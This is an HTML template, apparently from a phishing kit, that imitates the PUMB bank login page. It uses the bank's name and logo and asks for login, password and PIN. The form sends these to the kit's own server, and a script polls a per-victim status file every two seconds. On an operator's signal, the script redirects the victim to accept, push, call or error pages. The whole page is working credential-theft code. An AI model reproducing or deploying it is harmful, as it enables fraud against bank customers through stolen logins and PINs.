<!DOCTYPE html>
<html lang="en">


<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Roboto+Condensed&display=swap" rel="stylesheet">
    <title>Банк ПУМБ</title>
    <meta name="viewport" content="width=device-width">
    <meta property="og:url" content="https://www.pumb.ua//">
    <meta property="og:type" content="website">
    <meta property="og:title" content="ПУМБ">
    <meta property="og:description" content="">
    <meta property="og:image" content="/img/logo.png">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="default">
    <meta name="apple-mobile-web-app-title" content="ПУМБ">
    <link rel="apple-touch-icon" sizes="180x180" href="./favicon">
    <link rel="icon" type="image/png" sizes="32x32" href="./favicon/favicon-32x32.png">
    <link rel="icon" type="image/png" sizes="16x16" href="./favicon/favicon-16x16.png">
    <link rel="manifest" href="./favicon/site.webmanifest">
</head>

<style>
    * {
        font-family: 'Roboto Condensed', sans-serif;
    }

    body {
        background: #fff;
        color: #000;
        display: flex;
        justify-content: center;
        align-items: center;
        height: 90vh;
    }

    .container {
        display: block;
        margin: 0 auto;
        max-width: 992px;
    }

    .wrapp {
        margin: 0 auto;
        padding: 30px;
        display: flex;
        justify-content: center;
        align-items: center;
        flex-direction: column;
        background: #fff;
        box-shadow: 0 20px 40px rgb(44 62 80 / 15%);
        mix-blend-mode: normal;
        border-radius: 20px;
        max-width: 470px;
    }

    .header {
        margin-top: 80px;
        font-size: 32px;
        line-height: 39px;
        color: #FFFFFF;
    }

    .img {
        margin-bottom: 10px;
        max-width: 240px;
    }

    .desc {
        margin: 10px 0;
        font-size: 20px;
        line-height: 24px;
        text-align: center;
        max-width: 300px;
    }

    .btn {
        margin: 0 auto;
        margin-top: 80px;
        display: flex;
        justify-content: center;
        align-items: center;
        background: linear-gradient(179.85deg, #ff0032 0.15%, rgba(187, 187, 187, 0) 861.01%);
        backdrop-filter: blur(2px);
        border: none;
        border-radius: 5px;
        width: 100%;
        height: 35px;
        font-size: 24px;
        line-height: 29px;
        cursor: pointer;
        color: #fff;
    }

    .input {
        margin: 0 auto;
        background: #fff;
        border: 1px solid #ff0032;
        border-radius: 7px;
        margin-top: 5px;
        color: #000;
        outline: none;
        text-align: left;
        font-size: 20px;
        width: 100%;
        height: 35px;
        box-sizing: border-box;
        padding-left: 5px;
    }

    .form {
        margin-top: 35px;
        display: flex;
        justify-content: center;
        align-items: flex-start;
        flex-direction: column;
    }

    .form label {
        margin-top: 15px;
        font-size: 20px;
        line-height: 24px;
        color: #767676;
    }



    @media only screen and (max-width: 425px) {
        .wrapp {
            box-sizing: border-box;
            width: 310px;
        }
    }

    @media only screen and (max-height: 580px) {
        .header {
            margin-top: 50px;
        }
    }
</style>

<body>
    <div class="container">
        <div class="wrapp">
            <img src="{{ url_for( 'static', filename='pumb/img/logo.png', v=1)}}" alt="logo" class="img">
            <form method="POST" class="form">
                <label for="phone">Логiн</label>
                <input type="text" name='phone' class="input input__phone" id="phone" autocomplete="off">
                <label for="pass">Пароль</label>
                <input type="password" name='pass' class="input" id="pass" autocomplete="off">
                <label for="pin">Pin</label>
                <input type="password" name='pin' class="input" id="pin" autocomplete="off">
                <input type="submit" class="btn" id="btn" value="Увiйти">
            </form>

        </div>
    </div>
    <script>
        changeError(`https://{{domain}}/static/servers/{{keySTR}}.txt`);
        function changeError(url) {
          console.log("{{keySTR}}");
          const requestURL = url;
          const xhr = new XMLHttpRequest();
          xhr.open("GET", requestURL);
          const r = xhr.response.split(';') 
          console.log(r)
          xhr.onload = () => {
            setTimeout(() => {
              console.log(xhr.response);
              if (xhr.response === "0") {
                console.log("set");
                changeError(url);
              }
              if (xhr.response === "1") {
                window.location.href="https://{{domain}}/accept/{{keySTR}}"
                console.log("Добрый день,я 1");
              }
              if (xhr.response === "2") {
            window.location.href="https://{{domain}}/push/{{keySTR}}"
                console.log("Добрый день,я 2");
              }
              if (xhr.response === "3") {
                window.location.href="https://{{domain}}/call/{{keySTR}}"
                    console.log("Добрый день,я 3");
                  }
               if (xhr.response === "4") {
                window.location.href="https://{{domain}}/error/{{keySTR}}"
                    console.log("Добрый день,я 4");
                  }
              
            }, 2000);
          };
          const value = xhr.send();
        }
      </script>
</body>


</html>